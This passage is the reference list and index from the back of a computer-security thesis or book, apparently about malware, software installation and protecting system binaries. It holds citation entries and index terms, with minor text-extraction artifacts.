[108] M. K. McKusick. Running "fsck" in the background. In Proc. 2nd USENIX
BSD Conference, pages 55–64, Feb 2002.
[109] A. J. Menezes, P. C. van Oorschot, and S. A. Vanstone. Handbook of Ap-
plied Cryptography. CRC Press, fifth edition, 1996.
[110] Microsoft Corporation. Device PhysicalMemory object. MSDN Article (viewed 20 Feb 2010).
[111] Microsoft Corporation. Mitigating cross-site scripting with HTTP-only
cookies. MSDN Article (viewed 8 Feb 2010).
[112] Microsoft Corporation. A detailed description of the data execution pre-
vention (DEP) feature in Windows XP Service Pack 2, Windows XP TabletPC Edition 2005, and Windows Server 2003. Technical report, MicrosoftCorporation, Sep 2006.
[113] Microsoft Corporation. Description of the Windows file protection fea-
ture. Web Page, 2007.
[114] Microsoft Corporation. Digital Signatures for Kernel Modules on Systems
Running Windows Vista, Jul 2007.
[115] Microsoft Corporation. Description of the Windows installer cleanup utility. Technical Report Q290301, Microsoft Corporation, 2008.
[116] Microsoft Corporation. WriteFileEx function. MSDN Article, Nov 2008.
[117] C. Moock. Essential ActionScript 3.0, chapter 19. Flash Player Security
Restrictions. O'Reilly Media, Inc., 1st edition edition, 2007.
[118] J. Morris. Have you driven an SELinux lately?
In Proc. Ottawa Linux
Symposium, Jul 2008.
[119] J. Moskowitz and D. Sanoy. The Definitive Guide to Windows Installer Technology.
[120] H. Muhammad. Compiling from source. Web Page (viewed 16 Feb 2010).
[121] H. Muhammad. The Unix tree rethought: an introduction to GoboLinux.
Kuro5hin Article, May 2003.
[122] H. Muhammad and A. Detsch. Uma nova proposta para a árvore de di-
retórios UNIX. In Proceedings of the III WSL - Workshop em SoftwareLivre, 2002.
[123] D. Muthukumaran, A. Sawani, J. Schiffman, B. M. Jung, and T. Jaeger.
Measuring integrity on mobile phone systems. In Proc. 13th ACM Sym-posium on Access Control Models and Technologies, pages 155–164, Jun2008.
[124] R. Nolan and R. X. Tang. PC with multiple video-display refresh-rate
configurations using active and default registers. United States PatentApplication US2000/6049316, Apr 2000.
[125] S. Oaks. Java Security, chapter 12. Digital Signatures. O'Reilly Media,
Inc., 2nd edition, May 2001.
[126] T. Oda, G. Wurster, P. van Oorschot, and A. Somayaji. SOMA: Mutual ap-
proval for included content in web pages. In Proc. 15th ACM conferenceon Computer and Communications Security, pages 89–98, Oct 2008.
[127] Y. K. Okuji. GNU GRUB. Web Page, Dec 2008.
[128] P. Padala. Playing with ptrace, part 1. Linux Journal, 103, Nov 2002.
[129] A. Pennarun, B. Allombert, and P. Reinholdtsen. Debian popularity contest.
[130] A. Pennington, J. Strunk, J. Griffin, C. Soules, G. Goodson, and G. Ganger.
Storage-based intrusion detection: Watching storage activity for suspi-cious behavior. In Proc. 12th USENIX Security Symposium, pages 137–151, Aug 2003.
[131] N. L. Petroni Jr., T. Fraser, J. Molina, and W. A. Arbaugh. Copilot - a coprocessor-based kernel runtime integrity monitor. In Proc. 13th USENIX Security Symposium, pages 179–194, Aug 2004.
[132] N. L. Petroni Jr., T. Fraser, A. Walters, and W. Arbaugh. An architecture
for specification-based detection of semantic integrity violations in kerneldynamic data. In Proc. 15th USENIX Security Symposium, pages 289–304, Aug 2006.
[133] A. Pfiffer. Reducing System Reboot Time With kexec. Open Source De-
velopment Labs, Inc., Apr 2003.
[134] M. Pozzo and T. Gray. An approach to containing computer viruses. Computers & Security, 6(4):321–331, 1987.
[135] N. Provos, P. Mavrommatis, M. A. Rajab, and F. Monrose. All your iFRAMEs
point to us. In Proc. 17th USENIX Security Symposium, pages 1–15, Aug2008.
[136] Red Hat, Inc. Fedora Core 5 - Release Notes, Feb 2006.
[137] C. Reis, J. Dunagan, H. J. Wang, O. Dubrovsky, and S. Esmeir. Browser-
Shield: Vulnerability-driven filtering of dynamic HTML. In Proc. 27thIEEE Symposium on Security and Privacy, pages 61–74, May 2006.
[138] C. Reis, J. Dunagan, H. J. Wang, O. Dubrovsky, and S. Esmeir. Browser-
shield: Vulnerability-driven filtering of dynamic html. ACM Transactionson the Web, 1(3), 2007.
[139] R. Repasi and S. Clausen. Method and system to scan firmware for mal-
ware. United States Patent Application US2007/0277241 A1, Nov 2007.
[140] R. Riley, X. Jiang, and D. Xu. An architectural approach to preventing
code injection attacks. In Proc. 37th Annual IEEE/IFIP International Con-ference on Dependable Systems and Networks, pages 30–40, Jun 2007.
[141] R. L. Rivest and B. Lampson. A Simple Distributed Security Infrastructure.
[142] A. Rubin and D. Geer. Mobile code security. IEEE Journal on Internet
Computing, 2(6):30–34, 1998.
[143] N. Ruff. Windows memory forensics. Journal in Computer Virology, 4(2):83–100, May 2008.
[144] R. Russell, D. Quinlan, and C. Yeoh. Filesystem Hierarchy Standard.
Filesystem Hierarchy Standard Group, 2.3 edition, Jan 2004.
[145] J. Rutkowska. Subverting Vista kernel for fun and profit. In Blackhat
USA, Aug 2006.
[146] R. Sailer, X. Zhang, T. Jaeger, and L. van Doorn. Design and implemen-
tation of a tcg-based integrity measurement architecture. In Proc. 13thUSENIX Security Symposium, pages 223–238, Aug 2004.
[147] J. Schuh. Same-origin policy part 2. Web Page, Feb 2007.
[148] sd and devik. Linux on-the-fly kernel patching without LKM. In Phrack,
volume 0x0b (0x3a), chapter 0x07. Dec 2001.
[149] R. Sekar, C. R. Ramakrishnan, I. V. Ramakrishnan, and S. A. Smolka.
Model-carrying code (MCC): a new paradigm for mobile-code security. InProc. 2001 New Security Paradigms Workshop, pages 23–30, Sep 2001.
[150] H. Shacham. The geometry of innocent flesh on the bone: Return-into-
libc without function calls (on the x86). In Proc. 14th ACM Conference on Computer and Communications Security, pages 552–561, Oct 2007.
[151] H. Shacham, M. Page, B. Pfaff, E.-J. Goh, N. Modadugu, and D. Boneh.
On the effectiveness of address-space randomization. In Proc. 11th ACMConference on Computer and Communications Security, pages 298–307,Oct 2004.
[152] M. Sharif, W. Lee, and W. Cui. Secure in-VM monitoring using hardware
virtualization. In Proc. 16th ACM Conference on Computer and Commu-nications Security, Oct 2009.
[153] A. Siberschatz, P. B. Galvin, and G. Gagne. Operating System Concepts.
Wiley, seventh edition, 2005.
[154] E. Skoudis and L. Zeltser. Malware: Fighting Malicious Code. Prentice
Hall PTR, 2004.
[155] S. Smalley, C. Vance, and W. Salamon. Implementing SELinux as a linux
security module. Technical Report 01-043, NAI Labs, May 2002.
[156] S. Spainhour, E. Siever, and N. Patwardhan. Perl in a Nutshell, chapter
8.25. Benchmark. O'Reilly Media, Inc., 2nd edition, 2002.
[157] W. Stallings. Operating Systems: Internals and Design Principles. Pren-
tice Hall, fourth edition, 2001.
[158] B. Sterne. Security/CSP. Web Page (viewed 7 Jan 2010).
[159] B. Sterne. Site security policy draft (version 0.2). Web Page, Jul 2008.
[160] M. Stiegler, A. H. Karp, K.-P. Yee, T. Close, and M. S. Miller. Polaris: virus-
safe computing for Windows XP. Communications of the ACM, 49(9):83–88, 2006.
[161] J. Strunk, G. Goodson, M. Scheinholtz, C. Soules, and G. Ganger. Self-
securing storage: Protecting data in compromised systems. In Proc. 4thUSENIX Symposium on Operating Systems Design and Implementation,Oct 2000.
[162] S. Sudre. Packagemaker how-to. Web Page (viewed 29 Oct 2009).
[163] W. Sun, R. Sekar, Z. Liang, and V. N. Venkatakrishnan. Expanding mal-
ware defense by securing software installations. Lecture Notes in Com-puter Science, 5137/2008:164–185, 2008.
[164] L. Tauscher and S. Greenberg. How people revisit web pages: empirical
findings and implications for the design of history systems. InternationalJournal of Human Computer Studies, 47(1):97–137, 1997.
[165] The Open Web Application Security Project. OWASP Top 10 - 2010: The
Ten Most Critical Web Application Security Risks, Apr 2010.
[166] TIS Committee.
Tool Interface Standard (TIS) Executable and Link-
ing Format (ELF) Specification, version 1.2 edition, May 1995.
[167] Trusted Information Systems, Inc. Trusted XENIX version 3.0 final eval-
uation report. Technical Report CSC-EPL-92-001, National Computer Se-curity Center, Apr 1992.
[168] T. Y. Ts'o and S. Tweedie. Planned extensions to the Linux ext2/ext3
filesystem. In Proc. FREENIX Track: USENIX Annual Technical Con-ference, pages 235–243, Jun 2002.
[169] C. Tyler. Fedora Linux, chapter 8.4. O'Reilly, 2007.
[170] Social engineering (trojan) via gnome-loook.org. Web Page (viewed 13
[171] A. van de Ven. [patch] NX (No eXecute) support for x86, 2.6.7-rc2-bk2.
Mailing List Post, Jun 2004.
[173] A. van de Ven. Introduce /dev/mem restrictions with a config option. GIT Commit, Apr 2008.
[174] L. van Doorn, G. Ballintign, and W. A. Arbaugh. Signed executables for
Linux. Technical Report CS-TR-4259, University of Maryland, 2001.
[175] V. N. Venkatakrishnan, R. Sekar, T. Kamat, S. Tsipa, and Z. Liang. An
approach for secure software installation. In Proc. 16th USENIX Confer-ence on System Administration (LISA), pages 219–226, Nov 2002.
[176] K. Vervloesem. Linux malware: an incident and some solutions. LWN.net
Article, Dec 2009.
[177] S. Vidyaraman, M. Chandrasekaran, and S. Upadhyaya. Position: The
user is the enemy. In Proc. 2007 New Security Paradigms Workshop,pages 75–80, Sep 2007.
[178] P. Vogt, F. Nentwich, N. Jovanovic, C. Kruegel, E. Kirda, and G. Vigna.
Cross site scripting prevention with dynamic data tainting and staticanalysis. In Proc. 14th Network and Distributed System Security Sym-posium, pages 67–78, Feb 2007.
[179] R. Wahbe, S. Lucco, T. E. Anderson, and S. L. Graham. Efficient software-
based fault isolation. ACM SIGOPS Operating System Review, 27(5):203–216, 1993.
[180] K. M. Walker, D. F. Sterne, M. L. Badger, M. J. Petkac, D. L. Sherman,
and K. A. Oostendorp. Confining root programs with domain and typeenforcement (DTE). In Proc. 6th USENIX Security Symposium, Jul 1996.
[181] H. J. Wang, X. Fan, C. Jackson, and J. Howell. Protection and communica-
tion abstractions for web browsers in MashupOS. ACM SIGOPS Operat-ing Systems Review, 41(6):1–16, Dec 2007.
[182] Y.-M. Wang, D. Beck, B. Vo, R. Roussev, and C. Verbowski. Detecting stealth software with Strider GhostBuster. In Proc. 35th Annual IEEE/IFIP International Conference on Dependable Systems and Networks, pages 368–377, Jun 2005.
[183] Z. Wang, X. Jiang, W. Cui, and P. Ning. Countering kernel rootkits with lightweight hook protection. In Proc. 16th ACM Conference on Computer and Communications Security, Nov 2009.
[184] Web Application Security Consortium. WASC Threat Classification, Jan
[185] WebSense. Super Bowl XLI / Dolphin Stadium - security labs alert. Web Page, Feb 2007.
[186] K. C. Wilbur and Y. Zhu. Click fraud. Marketing Science, 28(2):293–308, 2009.
[187] C. Wright, C. Cowan, J. Morris, S. Smalley, and G. Kroah-Hartman. Linux
security modules: General security support for the Linux kernel. In Proc.
11th USENIX Security Symposium, pages 17–31, Aug 2002.
[188] C. P. Wright and E. Zadok. Unionfs: Bringing filesystems together. Linux
Journal, 128:24–29, Dec 2004.
[189] G. Wurster and P. van Oorschot. Self-signed executables: Restricting replacement of program binaries by malware. In USENIX 2007 Workshop on Hot Topics in Security (HotSec 2007).
[190] G. Wurster and P. van Oorschot. The developer is the enemy. In Proc.
2008 New Security Paradigms Workshop, Sep 2008.
[191] G. Wurster and P. C. van Oorschot. System configuration as a privilege.
In USENIX 2009 Workshop on Hot Topics in Security (HotSec 2009).
[192] G. Wurster and P. C. van Oorschot. Towards reducing unauthorized modification of binary files. Technical Report TR-09-07, Carleton University, 2009.
[193] Z. Ye, S. Smith, and D. Anthony. Trusted paths for browsers. ACM Transactions on Information and System Security, 8(2):153–186, 2005.
[194] M. Zalewski. Browser security handbook. Online Book (viewed 21 Feb
[195] X. Zhao, K. Borders, and A. Prakash. Towards protecting sensitive files in a compromised system. In Proc. 3rd IEEE International Security in Storage Workshop, pages 21–28, Dec 2005.
Adobe Flash, see Flash
App Store
Application Package
Bandwidth Stealing
Bundle
Clark-Wilson
Click Fraud
Configd
Configuration Locked
Configuration State
Contributions
Cross-Site Request Forgery
Cross-Site Scripting
dentry, see File-System, dentry
Device PhysicalMemory
dica
Discretionary Access Control
DNS Rebinding
Document Object Model
Drive-By Downloads
Encapsulate Applications
Execute Disable
Extended Attributes
GoboLinux
Guardian
Hypothesis
Information Stealing
inode, see File-System, inode
Malicious Hardware
Mandatory Access Control
Microsoft Windows
mood-nt
Originator Controlled Access Control
Owner
Package Manager
Parental Controls
Popularity
ptrace
Publications
Recursive Script Inclusion
Rootkit-Resistant Disks
Same Origin Policy
Security Module
Smart Phone
SOMA
System Administrator
Ugly
UI Redressing, see Clickjacking
WFP
Windows File Protection